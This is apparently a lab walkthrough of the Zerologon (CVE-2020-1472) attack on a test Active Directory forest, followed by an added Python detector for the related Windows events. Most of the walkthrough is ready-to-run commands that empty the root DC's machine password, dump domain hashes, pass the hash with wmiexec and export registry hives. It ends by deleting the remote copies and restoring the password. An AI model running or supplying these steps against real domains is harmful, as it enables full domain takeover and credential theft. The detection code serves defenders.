Environment

Domain forest environment

Root DC: 10.100.100.100 (Server 2019)

First-level forest DC: 10.100.100.101 (Server 2016)

Second-level forest DC: 10.100.100.102 (Server 2012 R2)

Jump host (attack machine): 10.100.100.105 (Windows 10)

Brief topology

[figure: topology diagram of the lab above]

Process

Exploitation flow: set the DC machine account password to empty -> read the domain admin hash -> read the SAM file hashes (ntds.dit) -> restore the DC machine account password

Attack

First install impacket:

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

Then download the exploit script:

git clone https://github.com/dirkjanm/CVE-2020-1472
cd CVE-2020-1472

Test directly against the root domain by running:

python cve-2020-1472-exploit.py AD 10.100.100.100

At this point the DC's machine account AD$ has had its password reset to empty (machine account = machine name followed by $).

Then read the hashes with impacket's secretsdump.py:

python secretsdump.py 0x20h.com/[email protected] -no-pass -just-dc

The captured hash can now be passed to wmiexec.py to execute commands:

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:197b00243031b8c3fe0379ea55b6d509 0x20h.com/[email protected]

Restoring the original state

Copy the SAM database from the DC to the attack machine:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

The commands above may report errors, but the SAM and the other hive files have already been exported.

Pull the files back to the local machine and delete the remote copies:

get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

Then run the following to obtain the plaintext hex (used as -hexpass below):

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Restore the machine account password:

python restorepassword.py [email protected] -target-ip 10.100.100.100 -hexpass 98ec4f29194948ac647217bd3e1daf4b7908e8c1 7aefe4084025672cd5cde13ade47748bb69ac95c2f4b0538b7a61a17a7a27b5ce108de5212656b73cb168cd1d58860573108e70aba41b345e478588795e07bbe13e25e0e76551ebb320acf12b46f6367e199857edc39ec790d8d6e0a01b847fae9549dc4ed7e961ca1678ca1fb5017efd5c716b506c7f37d44218e154921e6dde4dd5c74a4e9b2df5e017ba0e55224df6461f7508c03f8dd3067de61875ab896ddc44c1f5d3989ad8cf667bdc5457603fb79517ce6c428b1c82072c9285fa4fbabb4bd453b8e71c2233722807257761d8a8819ef72d3b4e2cdbfcda4

Check whether the password has been changed:

python secretsdump.py 0x20h.com/administrator:"域控密码"@10.100.100.100 -just-dc-user AD$
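As the defender's counterpart to the steps above, here is an added example (not from the original post and not part of impacket or the exploit repository): a small Python detector run over constructed event records that flags the footprint this machine-account password reset leaves on the DC. Event IDs 4742 and 5827-5829 are real Windows event IDs; the record field names follow their EventData, and the DC account set, sample values and timestamps are assumptions.

```python
# Added example (not part of the original post): detection rules for the
# Security/System-log footprint of the machine-account password reset shown
# above. Event records are constructed dicts shaped like the EventData fields
# of Windows events 4742 (computer account changed) and 5827-5829 (Netlogon).

DC_ACCOUNTS = {"AD$"}  # machine accounts of the domain controllers (assumed)

SAMPLE_EVENTS = [  # constructed sample records, not captured log output
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "AD$", "PasswordLastSet": "9/29/2020 2:37:32 PM"},
    {"EventID": 4742, "SubjectUserName": "AD$",
     "TargetUserName": "AD$", "PasswordLastSet": "9/29/2020 9:00:00 AM"},
    {"EventID": 4742, "SubjectUserName": "WS01$",
     "TargetUserName": "WS01$", "PasswordLastSet": "-"},
    {"EventID": 5829, "SamAccountName": "AD$", "Provider": "NETLOGON"},
]

NETLOGON_EVENTS = {  # logged by DCs after the August 2020 CVE-2020-1472 update
    5827: ("info", "vulnerable Netlogon secure channel from machine account denied"),
    5828: ("info", "vulnerable Netlogon secure channel from trust account denied"),
    5829: ("high", "vulnerable Netlogon secure channel ALLOWED (DC not enforcing)"),
}


def classify(evt):
    """Return (severity, message) for a suspicious record, or None."""
    eid = evt.get("EventID")
    if eid in NETLOGON_EVENTS:
        sev, msg = NETLOGON_EVENTS[eid]
        return sev, f"{msg}: {evt.get('SamAccountName')}"
    if eid != 4742:
        return None
    target = evt.get("TargetUserName", "")
    subject = evt.get("SubjectUserName", "")
    # Only machine accounts whose password attribute actually changed matter;
    # "-" means PasswordLastSet was not among the changed attributes.
    if not target.endswith("$") or evt.get("PasswordLastSet", "-") == "-":
        return None
    if subject.upper() == "ANONYMOUS LOGON":
        # Zerologon pattern: an unauthenticated caller reset the password
        return "critical", f"machine account password of {target} reset by ANONYMOUS LOGON"
    if target in DC_ACCOUNTS and subject != target:
        return "high", f"DC machine account {target} password changed by {subject}"
    return None  # routine self-rotation: the machine changes its own password


def detect(events):
    """Run classify() over a sequence of records and return the findings."""
    return [(evt["EventID"], *hit) for evt in events if (hit := classify(evt))]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

In a real deployment the records would come from the DC's Security log (4742) and System log (5827-5829), for example via a SIEM export, rather than from the constructed list.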

Conclusion

If the environment is a domain forest and the network has connectivity to the root DC, the root DC can be attacked directly.